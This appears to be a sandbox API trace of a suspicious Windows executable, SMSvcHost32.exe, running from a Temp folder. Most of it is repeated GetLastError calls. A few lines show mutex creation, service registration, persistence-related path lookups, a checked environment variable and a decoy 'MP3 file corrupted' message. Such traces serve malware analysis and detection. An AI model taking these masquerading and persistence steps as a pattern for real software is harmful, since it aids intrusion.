	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.955] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.956] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.957] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.958] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\Internet Explorer\\", lpDst=0x6572c0, nSize=0x104 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 0x3f
	[0087.959] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\Tasks\\", lpDst=0x6574d0, nSize=0x104 | out: lpDst="C:\\Windows\\Tasks\\") returned 0x12
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetLastError () returned 0x0
	[0087.959] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x205fca4, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0087.959] PathFindFileNameW (pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="SMSvcHost32.exe"
	[0087.959] lstrlenW (lpString="SMSvcHost32.exe") returned 15
	[0087.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fe30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.960] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] GetLastError () returned 0xcb
	[0087.961] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="ServiceEntryPointThread") returned 0x0
	[0087.961] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="ServiceEntryPointThread") returned 0x1d0
	[0087.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40ec70, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d8
	[0087.962] CloseHandle (hObject=0x1d8) returned 1

Thread:
	id = 98
	os_tid = 0x840

	[0087.963] StrRChrW (lpStart="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpEnd=0x0, wMatch=0x5c) returned="\\SMSvcHost32.exe"
	[0087.963] StartServiceCtrlDispatcherW (lpServiceTable=0x24eff64*(lpServiceName="SMSvcHost32.exe", lpServiceProc=0x4220d0)) returned 0

Thread:
	id = 99
	os_tid = 0xef0

	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.967] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] GetLastError () returned 0x57
	[0087.968] OutputDebugStringA (lpOutputString="MP3 file corrupted") 
	[0087.968] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40feb0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec
	[0087.968] CloseHandle (hObject=0x1ec) returned 1
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetLastError () returned 0x57
	[0087.969] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x262f9cc, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.969] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0087.970] GetProcAddress (hModule=0x765a0000, lpProcName="GetNativeSystemInfo") returned 0x765bac70
	[0087.970] GlobalMemoryStatusEx (in: lpBuffer=0x262f994 | out: lpBuffer=0x262f994) returned 1
	[0087.970] GetLastError () returned 0xcb
	[0087.970] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.971] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.972] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
	[0087.973] GetLastError () returned 0xcb
